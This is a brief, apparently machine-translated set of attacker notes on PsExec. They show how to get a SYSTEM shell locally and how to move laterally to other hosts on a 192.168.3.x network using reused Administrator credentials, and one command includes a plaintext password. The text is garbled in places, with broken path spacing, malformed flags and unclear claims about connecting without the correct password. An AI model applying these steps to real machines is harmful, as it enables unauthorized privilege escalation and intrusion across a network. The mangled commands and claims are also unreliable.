1. The local system to privilege escalation
Command execution
PsExec.exe /accepteula /s \127.0.0.1 cmd /c “whoami”
Interactive cmd
C:\Documents and Settings\Administrator\桌面>PsExec.exe /accepteula /s \127.0.0.1 cmd
2. Connect the other machines
Command execution
If the password is the same as the two machines, the correct password is not required may execute commands such as connection 192.168.3.56.
(So if you are a user domain can be any connection tube within any one machine.)
C: \ Documents and Settings \ Administrator \ Desktop> PsExec.exe / accepteula / s \ 192.168.3.56 -u Administrator -ps cmd / c "ipconfig "
Interactive cmd Login
PsExec.exe / accepteula / s \ 192.168.3.90 -u Administrator -p Aa19970511 cmd
port connection